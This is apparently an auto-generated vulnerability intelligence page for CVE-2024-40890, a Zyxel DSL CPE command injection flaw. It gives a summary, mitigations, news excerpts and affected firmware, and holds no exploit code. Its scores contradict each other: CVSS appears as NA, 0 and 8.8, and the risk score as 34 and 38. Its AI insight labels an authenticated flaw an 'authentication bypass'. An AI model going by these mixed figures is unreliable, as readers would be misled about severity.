CVE Radar Logo
CVERadar
CVE Radar Logo
CVERadar

CVE-2024-40890

Medium Severity
Zyxel
SVRS
34/100
CVSSv3
NA/10
EPSS
0.19182/1

CVE-2024-40890 is a command injection vulnerability affecting Zyxel VMG4325-B10A devices, potentially allowing attackers to execute OS commands. This post-authentication vulnerability resides in the CGI program of the legacy DSL CPE. Successful exploitation involves sending a crafted HTTP POST request after authentication. While the CVSS score is 0 because it's UNSUPPORTED WHEN ASSIGNED, active exploits are available, indicating a real-world threat. The SOCRadar Vulnerability Risk Score (SVRS) is 34, suggesting a moderate risk level despite the unsupported status and low CVSS, largely due to the existence of active exploits and its inclusion in CISA KEV. Organizations using the affected Zyxel devices should investigate and mitigate the potential for command injection attacks by looking into alternative firmwares or mitigations. This vulnerability is significant because even older, unsupported devices can pose a risk if left unpatched when actively exploited.

TAGS
In The Wild
Vendor-advisory
CISA KEV
Exploit Avaliable
VECTOR STRING
PUBLICATION DATE2025-02-04
LAST MODIFIED2025-02-12
Eye Icon
SOCRadar
AI Insight

Description

CVE-2024-40890 is a post-authentication command injection vulnerability present in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(AAFR.4)C0_20170615. This vulnerability allows an authenticated attacker to execute arbitrary operating system (OS) commands on an affected device by sending a specially crafted HTTP POST request.

While the CVSS score is 8.8, the SOCRadar Vulnerability Risk Score (SVRS) is 38, indicating a lower immediate threat level. However, the vulnerability is tagged as "In The Wild," meaning it is actively exploited by attackers. Therefore, immediate action is still critical to mitigate this risk.

Key Insights

  1. Remote Code Execution: The vulnerability allows an attacker to remotely execute arbitrary code on the affected device, potentially granting full control over the system.
  2. Authentication Bypass: The vulnerability requires authentication, implying the attacker has legitimate access to the device. However, the attack vector involves crafting a specific HTTP request, which could be utilized to bypass access controls or exploit weak authentication mechanisms.
  3. Legacy Firmware: The vulnerability impacts a legacy firmware version of the Zyxel VMG4325-B10A DSL CPE, indicating a potential risk for organizations still utilizing older or outdated devices.
  4. Active Exploitation: The "In The Wild" tag signifies that attackers are actively exploiting this vulnerability in real-world attacks. This underscores the urgency of applying mitigation measures to prevent successful exploitation.

Mitigation Strategies

  1. Firmware Update: Immediately update the firmware on all affected Zyxel VMG4325-B10A DSL CPE devices to a version that addresses the vulnerability.
  2. Network Segmentation: Isolate affected devices from critical networks to limit the potential impact of a successful exploit.
  3. Access Control: Implement strong access control measures to restrict access to the device's configuration interface and prevent unauthorized users from accessing it.
  4. Intrusion Detection/Prevention Systems (IDS/IPS): Configure IDS/IPS systems to detect and block potential malicious traffic associated with this vulnerability.

Additional Information

For further information or assistance regarding this incident, you can utilize the 'Ask to Analyst' feature, contact SOCRadar directly, or open a support ticket for more information if necessary.

Indicators of Compromise

No IOCs found for this CVE

Exploits

TitleSoftware LinkDate
Zyxel DSL CPE OS Command Injection Vulnerabilityhttps://www.cisa.gov/search?g=CVE-2024-408902025-02-11
Enhance Your CVE Management with SOCRadar Vulnerability Intelligence
Get comprehensive CVE details, real-time notifications, and proactive threat management all in one platform.
CREATE FREE ACCOUNT
CVE Details
Access comprehensive CVE information instantly
Real-time Tracking
Subscribe to CVEs and get instant updates
Exploit Analysis
Monitor related APT groups and threats
IOC Tracking
Analyze and track CVE-related IOCs

News

Flashpoint Weekly Vulnerability Insights and Prioritization Report
Flashpoint Intel Team2025-05-01
Flashpoint Weekly Vulnerability Insights and Prioritization Report | Anticipate, contextualize, and prioritize vulnerabilities to effectively address threats to your organization. The post Flashpoint Weekly Vulnerability Insights and Prioritization Report appeared first on Flashpoint. <div
flashpoint-intel.com
rss
forum
news
U.S. CISA adds Microsoft Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog
Pierluigi Paganini2025-02-12
U.S. CISA adds Microsoft Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog | U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows, Zyxel device flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The vulnerability CVE-2024-40891 is a command injection issue in Zyxel CPE Series devices that remains unpatched and has not yet [&#8230;] U.S
securityaffairs.co
rss
forum
news
CISA Adds Four Known Exploited Vulnerabilities to Catalog
CISA2025-02-11
CISA Adds Four Known Exploited Vulnerabilities to Catalog | CISA has added four vulnerabilities to its&nbsp;Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. <a class="fui-Link ___1q1shib f2hkw1w f3rmtva f1ewtqcl fyind8e f1k6fduh f1w7gpdv fk6fouc fjoy568 figsok6 f1s184ao f1mk8lai fnbmjn9 f1o700av f13mvf36 f1cmlufx f9n3di6 f1ids18y f1tx3yz7 f1deo86v f1eh06m1 f1iescvh fhgqx19 f1olyrje f1p93eir f1nev41a f1h8hb77 f1lqvz6u f10aw75t fsle3fq f17ae5zn ext" href="https://www.cve.org/CVERecord?id=CVE-2024-40891" rel="noreferrer noopener" target="_blank" title
cisa.gov
rss
forum
news
Critical Zero-Day Vulnerability in Zyxel Devices Sparks Widespread Exploitation
Shivani Tiwari ([email protected])2025-02-04
Critical Zero-Day Vulnerability in Zyxel Devices Sparks Widespread Exploitation | Cybersecurity researchers at GreyNoise have uncovered widespread exploitation of a critical zero-day vulnerability in Zyxel CPE Series devices, months after it
blogger.com
rss
forum
news
CVE-2024-40890 | Zyxel VMG4325-B10A up to 1.00(AAFR.4)C0_20170615 os command injection
vuldb.com2025-02-04
CVE-2024-40890 | Zyxel VMG4325-B10A up to 1.00(AAFR.4)C0_20170615 os command injection | A vulnerability classified as critical has been found in Zyxel VMG4325-B10A up to 1.00(AAFR.4)C0_20170615. Affected is an unknown function. The manipulation leads to os command injection. This vulnerability is traded as CVE-2024-40890. It is possible to launch the attack remotely. There is no exploit available.
vuldb.com
rss
forum
news
Attackers actively exploit a critical zero-day in Zyxel CPE Series devices
Pierluigi Paganini2025-01-29
Attackers actively exploit a critical zero-day in Zyxel CPE Series devices | Experts warn that threat actors are actively exploiting critical zero-day vulnerability, tracked as CVE-2024-40891, in Zyxel CPE Series devices. GreyNoise researchers are observing&#160;active exploitation attempts&#160;targeting a zero-day, tracked as CVE-2024-40891, in Zyxel CPE Series devices. The vulnerability is a command injection issue that remains unpatched and has not yet been publicly disclosed. Attackers can exploit [&#8230;] <h2 class="wp
securityaffairs.co
rss
forum
news
Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability
Ajit Jasrotia2025-01-29
Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE-2024-40891 Vulnerability | Cybersecurity researchers are warning that a critical zero-day vulnerability impacting Zyxel CPE Series devices is seeing active exploitation attempts in the wild. &#8220;Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration,&#8221; GreyNoise researcher Glenn Thorpe said in an alert published Tuesday. The [&#8230;] The post Zyxel CPE Devices Face Active Exploitation Due to Unpatched CVE
allhackernews.com
rss
forum
news

Social Media

🚨 Atenção! CVE-2024-40890: Vulnerabilidade de injeção de comando em dispositivos Zyxel DSL CPE. Um atacante autenticado pode executar comandos OS via HTTP. Se seu dispositivo é EoL/EoS, descontinue o uso até que uma mitigação esteja disponível. #CyberSecurity #InfoSec #CVE
0
0
1
CVE-2024-40890: (CVSS:8.8, Severity: High, More Details: https://t.co/mxPIe6l2gf) Legacy Zyxel DSL CPE VMG4325-B10A allows authenticated attackers to execute OS commands via crafted HTTP POST request due to a command injection in the CGI program.
0
0
0
[CVE-2024-40890: HIGH] Critical vulnerability in Zyxel VMG4325-B10A firmware v1.00(AAFR.4)C0_20170615 enables OS command execution via crafted HTTP POST request. Keep devices updated to stay secure.#cybersecurity,#vulnerability https://t.co/4WS3oaWqqi https://t.co/aPbvsonoDs
0
0
0
CVE-2024-40890 **UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the CGI program of the legacy DSL CPE Zyxel VMG4325-B10A firmware version 1.00(… https://t.co/tJSs7Sbo3G
0
0
1
Attackers actively exploit a critical zero-day in Zyxel CPE Series devices https://t.co/TNm4vizFud “CVE-2024-40891 is very similar to CVE-2024-40890, with the main difference being that the former is telnet-based while the latter is HTTP-based.”
1
0
0

Affected Software

Configuration 1
TypeVendorProduct
OSZyxelvmg1312-b10a_firmware
Configuration 2
TypeVendorProduct
OSZyxelvmg1312-b10b_firmware
Configuration 3
TypeVendorProduct
OSZyxelvmg1312-b10e_firmware
Configuration 4
TypeVendorProduct
OSZyxelvmg3312-b10a_firmware
Configuration 5
TypeVendorProduct
OSZyxelvmg3313-b10a_firmware
Configuration 6
TypeVendorProduct
OSZyxelvmg3926-b10b_firmware
Configuration 7
TypeVendorProduct
OSZyxelvmg4325-b10a_firmware
Configuration 8
TypeVendorProduct
OSZyxelvmg4380-b10a_firmware
Configuration 9
TypeVendorProduct
OSZyxelvmg8324-b10a_firmware
Configuration 10
TypeVendorProduct
OSZyxelvmg8924-b10a_firmware
Configuration 11
TypeVendorProduct
OSZyxelsbg3300-n000_firmware
Configuration 12
TypeVendorProduct
OSZyxelsbg3300-nb00_firmware
Configuration 13
TypeVendorProduct
OSZyxelsbg3500-n000_firmware
Configuration 14
TypeVendorProduct
OSZyxelsbg3500-nb00_firmware

References

ReferenceLink
[email protected]https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-insecure-default-credentials-vulnerabilities-in-certain-legacy-dsl-cpe-02-04-2025

CWE Details

CWE IDCWE NameDescription
CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

CVE Radar

Real-time CVE Intelligence & Vulnerability Management Platform

CVE Radar provides comprehensive vulnerability intelligence by monitoring CVE databases, security advisories, and threat feeds. Get instant updates on new vulnerabilities, exploit details, and mitigation strategies specific to your assets.

Get Free Vulnerability Intelligence AccessAccess real-time CVE monitoring, exploit analysis, and threat intelligence